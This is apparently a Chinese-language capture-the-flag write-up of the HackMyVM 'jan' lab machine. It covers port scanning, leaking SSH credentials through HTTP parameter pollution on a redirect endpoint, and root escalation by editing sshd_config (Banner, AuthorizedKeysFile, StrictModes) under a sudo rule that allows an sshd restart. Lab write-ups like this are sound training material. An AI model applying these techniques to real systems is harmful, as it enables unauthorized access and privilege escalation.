HMV-jan

HMV-jan靶场复盘

端口扫描

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.147  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-05 10:22 CST
Nmap scan report for 192.168.240.147 (192.168.240.147)
Host is up (0.0027s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey: 
|   256 2c:0b:57:a2:b3:e2:0f:6a:c0:61:f2:b7:1f:56:b4:42 (ECDSA)
|_  256 45:97:b0:2b:48:9b:4a:36:8e:db:44:bd:3f:15:cf:32 (ED25519)
8080/tcp open  http    Golang net/http server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Date: Wed, 05 Feb 2025 02:22:24 GMT
|     Content-Length: 45
|     Content-Type: text/plain; charset=utf-8
|     Welcome to our Public Server. Maybe Internal.
|   GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   OfficeScan: 
|     HTTP/1.1 400 Bad Request: missing required Host header
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request: missing required Host header
|_http-open-proxy: Proxy might be redirecting requests

web探测

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.147:8080                         
Welcome to our Public Server. Maybe Internal.

没有什么有用的信息,扫一下目录

┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u http://192.168.240.147:8080
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/http_192.168.240.147_8080/_25-02-05_10-25-54.txt

Target: http://192.168.240.147:8080/

[10:25:54] Starting: 
[10:25:54] 301 -   57B  - /%2e%2e//google.com  ->  /%252E%252E/google.com   
[10:25:57] 301 -   65B  - /axis2//axis2-web/HappyAxis.jsp  ->  /axis2/axis2-web/HappyAxis.jsp
[10:25:57] 301 -   59B  - /axis2-web//HappyAxis.jsp  ->  /axis2-web/HappyAxis.jsp
[10:25:57] 301 -   54B  - /axis//happyaxis.jsp  ->  /axis/happyaxis.jsp     
[10:25:58] 301 -   87B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[10:25:59] 301 -   77B  - /engine/classes/swfupload//swfupload_f9.swf  ->  /engine/classes/swfupload/swfupload_f9.swf
[10:25:59] 301 -   74B  - /engine/classes/swfupload//swfupload.swf  ->  /engine/classes/swfupload/swfupload.swf
[10:25:59] 301 -   62B  - /extjs/resources//charts.swf  ->  /extjs/resources/charts.swf
[10:26:00] 301 -   72B  - /html/js/misc/swfupload//swfupload.swf  ->  /html/js/misc/swfupload/swfupload.swf
[10:26:03] 400 -   24B  - /redirect                                         
[10:26:03] 200 -   16B  - /robots.txt                                   
Task Completed

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.147:8080/robots.txt
/redirect
/credz

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.147:8080/robots.txt
/redirect
credz                                      
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.147:8080//credz    
<a href="/credz">Moved Permanently</a>.        
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.147:8080/redirect
Parameter 'url' needed.            
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.147:8080/redirect?url=1
Only accessible internally.                          

这里给了两个目录，但是分别单独访问都没有结果，在redirect用了url参数也没用
之前做过一个靶机有也是给了目录好像是secret 和 home 后面用了这两个的组合路径
这里也试试 –> 还是没用 扫描二级目录也没有
原来这里的url提示是url的参数传credz并且要组合传，让http解析最后一个参数

┌──(root㉿kakeru)-[~/tmp]
└─# curl 'http://192.168.240.147:8080/redirect?url=1&url=/credz'
ssh/EazyLOL 

得到ssh的用户名和密码 用户名就是ssh

提权

有一个sudo命令可以让ssh服务重启

jan:~$ sudo -l
Matching Defaults entries for ssh on jan:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for ssh:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User ssh may run the following commands on jan:
    (root) NOPASSWD: /sbin/service sshd restart

所以目标就是更改ssh的配置文件，让ssh服务重启 sshd_config（修改的是客户端的内容）

#X11UseLocalhost yes                                                                           
#PermitTTY yes                                                                                 
#PrintMotd yes                                                                                 
#PrintLastLog yes                                                                              
#TCPKeepAlive yes                                                                              
#PermitUserEnvironment no                                                                      
#Compression delayed                                                     
#ClientAliveInterval 0                                                   
#ClientAliveCountMax 3                                                   
#UseDNS no                                                               
#PidFile /run/sshd.pid                                                   
#MaxStartups 10:30:100                                                   
#PermitTunnel no                                                         
#ChrootDirectory none                              
#VersionAddendum none                 
                                      
# no default banner path              
#Banner /root/root.txt                
                                      
# override default of no subsystems   
Subsystem       sftp    internal-sftp 
                                      
# Example of overriding settings on a per-user basis
#Match User anoncvs                   
#       X11Forwarding no         
#       AllowTcpForwarding no    
#       PermitTTY no                                                         
#       ForceCommand cvs server   

这里可以修改banner就可以读取任何想要的文件
但是直接ssh登录会报错

jan:/etc/ssh$ ssh root@locakhost
/etc/ssh/ssh_config: line 23: Bad configuration option: banner
/etc/ssh/ssh_config: terminating, 1 bad configuration options

根据错误信息，把ssh_config中的banner删掉

然后用ssh就可以读到flag

┌──(root㉿kakeru)-[~/tmp]
└─# ssh ssh@192.168.240.147
HMV2PRMTERWTFUDNGMBG
ssh@192.168.240.147's password: 

如果要登录到root，我们可以修改

AuthorizedKeysFile      .ssh/authorized_keys                                  

把.ssh/authorized_keys修改成我们自己创的 /home/ssh/authorized_keys

jan:~$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxliao26atOJyX3C9UgtIxt3RY9S4n921sYgmAxhw5sB58FESP8E+kWMC4QbT2
3azUa8zVr76QNhru+LVFTrW5R9SyxDDYQWjfRwDBiSe2X5MNiqoQU4tiW71DGYiO9M0xQNVx5Auvx6Ip6+kJqEpnXoU0Gw4zRxB3HjeEwYIly8HFA
TKaOP3Gh7rhwOXJ8gjcF7d6NcnsNbnOeUEArJjDhsax72TIiBYmza0PTg+8YZrjwvDqdZ+swMq5R9SPsn4sLyF5R82wjAajO4ce8qwcIanBxw5KeB
fiChtilCaYb0JXH2bNlyQwedGjL2ARtnjgPhIKU/3N42trAcEXDwBCxkLRRGVkgrFDdYN70kcgfo2+7A7hBk2H7EFfY44bGcD9+YDsEqVS38VfxcD
HNfM5V1ypS+ZirpY/RXK+46nHfAaieMuhNffS/zegzQEUTR1iHXWvDFOlwS7w3SNiBh4p69NyefputLJEdBhWUrIbsqvIOOzVNC03f7hd0Yq0gsZb
vt7g10X4k18Wf7aI/3qg26Yw+LJ9zq1VBSKaon0fTYtxrDGyn3qGeT1dKUyFQzbKkKN19X6VYjlSWzFvEft7lgLixwZnsQabUR8XT0UIwfJbN7FU9
j+hQos8PBWXsqZIX1q+by5prOChPXMP9phGofL8q+SrrKdPUZDMxV8Hbw== root@kakeru' > authorized_keys 

这里不要直接vi进去粘贴私钥内容，就像这样echo进去（我试过直接粘贴进去但是不行，可能是换行什么的问题)
内容改成本机 /.ssh/id_rsa.pub
而且配置文件中需要修改

StrictModes no  #从yes改成no 注释删掉

得到rootshell

┌──(root㉿kakeru)-[~/.ssh]
└─# ssh root@192.168.240.147
HMV2PRMTERWTFUDNGMBG
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

jan:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
jan:~#